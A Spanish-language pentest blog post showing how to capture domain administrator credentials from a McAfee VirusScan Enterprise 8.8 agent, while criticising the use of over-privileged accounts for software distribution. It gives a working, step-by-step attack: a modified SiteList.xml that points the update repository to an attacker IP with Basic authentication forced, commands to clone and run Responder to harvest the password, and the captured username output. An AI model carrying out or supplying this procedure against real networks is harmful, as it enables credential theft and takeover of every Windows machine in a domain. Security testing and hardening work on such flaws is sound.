Por cierto, si queréis saber más sobre la adquisición de evidencias volátilies (a parte del volcado de la RAM), no dejéis de consultar este post de los chicos de Security at Work. Hay cosas muy interesantes.

Obteniendo privilegios de administrador de dominio con McAfee o la manía de usar cuentas con demasiados permisos

El título de esta entrada es tan largo como el tiempo que llevo encontrándome el uso de cuentas con demasiados privilegios para actualizar algunos programas. En serio que les agradezco que faciliten tanto la vida a la hora de hacer un pentest pero NO es necesario usar usuarios que pertenezcan al grupo de administradores de dominio para distribuir software en un Directorio Activo.



La consecuencia de hacerlo es que cualquier fallo puede derivar en el compromiso de todos los equipos Windows de una red local.


Hace unos días vimos un ejemplo cuando Toufik Airane publicó en Github cómo capturar las credenciales usadas por un agente McAfee VirusScan Enterprise 8.8 a la hora de intentar actualizarse contra los repositorios definidos en la ePO.
 
Concretamente los repositorios están definidos en "C:\ProgramData\McAfee\Common Framework\SiteList.xml", donde encontraremos los servidores para conectarse por HTTP o SMB (UNC) además de los nombres de usuario y las credenciales cifradas:

<?xml version="1.0" encoding="UTF-8"?>
<ns:SiteLists xmlns:ns="naSiteList" GlobalVersion="20150327073827" LocalVersion="Fri, 9 Oct 2013 09:23:23 UTC" Type="Client">
<Policies><Setting name="OverwriteClientSites">1</Setting><Setting name="nMaxHopLimit">1</Setting>
<Setting name="nMaxPingTimeout">5</Setting><Setting name="uiFindNearestMethod">2</Setting></Policies>

<SiteList Default="1" Name="SomeGUID">

<SpipeSite Type="master" Name="REPO1" Order="2" Enabled="1" Local="0" Server="servidor.dominio:8005" ServerName="servidor:8005" ServerIP="192.168.1.200:8005" Version="4.0.0"><RelativePath>Software</RelativePath><UseAuth>0</UseAuth><UserName></UserName><Password Encrypted="1">XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX</Password></SpipeSite>

<UNCSite Type="repository" Name="REPO2" Order="1" Server="servidor" Enabled="1" Local="0"><ShareName>Mad</ShareName><RelativePath></RelativePath><UseLoggedonUserAccount>0</UseLoggedonUserAccount><DomainName>*DOMINIO*</DomainName><UserName>usuario_epo</UserName><Password Encrypted="1">XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX</Password></UNCSite>

<HttpSite Type="fallback" Name="REPO3" Order="3" Enabled="1" Local="0" Server="update.nai.com:80"><RelativePath>Products/CommonUpdater</RelativePath><UseAuth>0</UseAuth><UserName>Anónimo</UserName><Password Encrypted="1">XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX</Password></HttpSite>

</SiteList>
</ns:SiteLists>

Como veremos para poder acceder al repositorio "REPO2" se utiliza el usuario 'usuario_epo'el cual, como podemos comprobar a continuación, es además miembro del grupo '*Domain Admins':

PS C:\Users\vmotos> net user usuario_epo /domain
Se procesará la solicitud en un controlador de dominio del dominio *DOMINIO*.

Nombre de usuario                          usuario_epo
Nombre completo                            usuario_epo
Comentario
Comentario del usuario
Código de país                             000 (Predeterminado por el equipo)
Cuenta activa                              Sí
La cuenta expira                           Nunca

Ultimo cambio de contraseña                16/03/2014 7:53:12
La contraseña expira                       Nunca
Cambio de contraseña                       16/03/2014 7:53:12
Contraseña requerida                       Sí
El usuario puede cambiar la contraseña     Sí

Estaciones de trabajo autorizadas          Todas
Script de inicio de sesión
Perfil de usuario
Directorio principal
Ultima sesión iniciada                     05/02/2016 18:12:03

Horas de inicio de sesión autorizadas      Todas

Miembros del grupo local
Miembros del grupo global                  *Domain Admins
                                           *Domain Users
Se ha completado el comando correctamente.

Como podémos imaginar, a partir de este momento ese usuario se convierte en la golosina más apetecible para cualquier atacante, que sólo tiene que modificar el archivo"SiteList.xml" (en un PC nuevo si la consola está protegida con contraseña) para que apunte a una IP maliciosa que estará escuchando ansiosamente la "llamada" con las valiosas credenciales:
<?xml version="1.0" encoding="UTF-8"?>
<ns:SiteLists xmlns:ns="naSiteList" Type="Client">
<SiteList Default="1" Name="SomeGUID">

<HttpSite Type="fallback" Name="PWNED!" Order="1" Enabled="1" Local="0" Server="192.168.1.32:80">
<RelativePath>LICORNE</RelativePath><UseAuth>1</UseAuth>
<UserName>usuario_epo</UserName>
<Password Encrypted="1">XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX</Password>
</HttpSite>

</SiteList></ns:SiteLists>
  
Puedes comprobar si tenemos acceso a la consola que la lista de repositorios de AutoUpdate ha sido modificada:

  
Ahora sólo falta levantar el servidor falso que recoja la contraseña. 

git clone https://github.com/SpiderLabs/Responder.git
cd Responder/
python Responder.py -I eth0 --basic


  .----.-----.-----.-----.-----.-----.--|  |.-----.----.
  |   _|  -__|__ --|  _  |  _  |     |  _  ||  -__|   _|
  |__| |_____|_____|   __|_____|__|__|_____||_____|__|
                   |__|

           NBT-NS, LLMNR & MDNS Responder 2.3

  Original work by Laurent Gaffie (lgaffie@trustwave.com)
  To kill this script hit CRTL-C


[+] Poisoners:
    LLMNR                      [ON]
    NBT-NS                     [ON]
    DNS/MDNS                   [ON]

[+] Servers:
    HTTP server                [ON]
    HTTPS server               [ON]
    WPAD proxy                 [OFF]
    SMB server                 [ON]
    Kerberos server            [ON]
    SQL server                 [ON]
    FTP server                 [ON]
    IMAP server                [ON]
    POP3 server                [ON]
    SMTP server                [ON]
    DNS server                 [ON]
    LDAP server                [ON]

[+] HTTP Options:
    Always serving EXE         [OFF]
    Serving EXE                [ON]
    Serving HTML               [OFF]
    Upstream Proxy             [OFF]

[+] Poisoning Options:
    Analyze Mode               [OFF]
    Force WPAD auth            [OFF]
    Force Basic Auth           [ON]
    Force LM downgrade         [OFF]
    Fingerprint hosts          [OFF]

[+] Generic Options:
    Responder NIC              [eth0]
    Responder IP               [192.168.1.32]
    Challenge set              [1122334455667788]


[+] Listening for events...
 Por último forzamos la actualización...


Y ya tenemos la contraseña de todo un señor administrador de dominio: 
[*] [LLMNR]  Poisoned answer sent to 192.168.1.41 for name 192.168.1.32

[HTTP] Basic Client   : 192.168.1.41
[HTTP] Basic Username : usuario_epo
[HTTP] Basic Password : *\contraseña/*

Fuentehttps://github.com/tfairane/HackStory/blob/master/McAfeePrivesc.md